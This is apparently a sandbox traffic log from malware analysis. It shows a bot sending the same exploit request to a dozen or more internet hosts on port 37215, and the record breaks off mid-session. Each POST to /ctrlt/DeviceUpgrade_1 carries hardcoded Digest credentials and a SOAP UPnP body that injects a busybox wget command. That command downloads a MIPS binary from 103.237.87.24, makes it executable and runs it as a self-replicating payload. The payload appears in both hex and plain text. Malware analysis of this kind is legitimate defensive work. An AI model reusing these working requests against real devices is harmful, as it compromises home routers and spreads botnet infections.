69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  166192.168.2.135460241.46.83.24937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.066242933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  167192.168.2.1347642197.110.111.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.066287041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  168192.168.2.135971241.37.237.8937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.066287041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  169192.168.2.1348496197.212.93.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.066292048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  170192.168.2.1352102197.147.159.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.066318035 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  171192.168.2.1345238197.84.122.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.067939043 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  172192.168.2.1350506157.83.112.17037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.067950010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  173192.168.2.1345922157.182.232.9637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.067950964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  174192.168.2.136013841.131.53.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.067951918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  175192.168.2.1348918146.20.124.5837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.067977905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  176192.168.2.133553652.239.241.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.067981958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
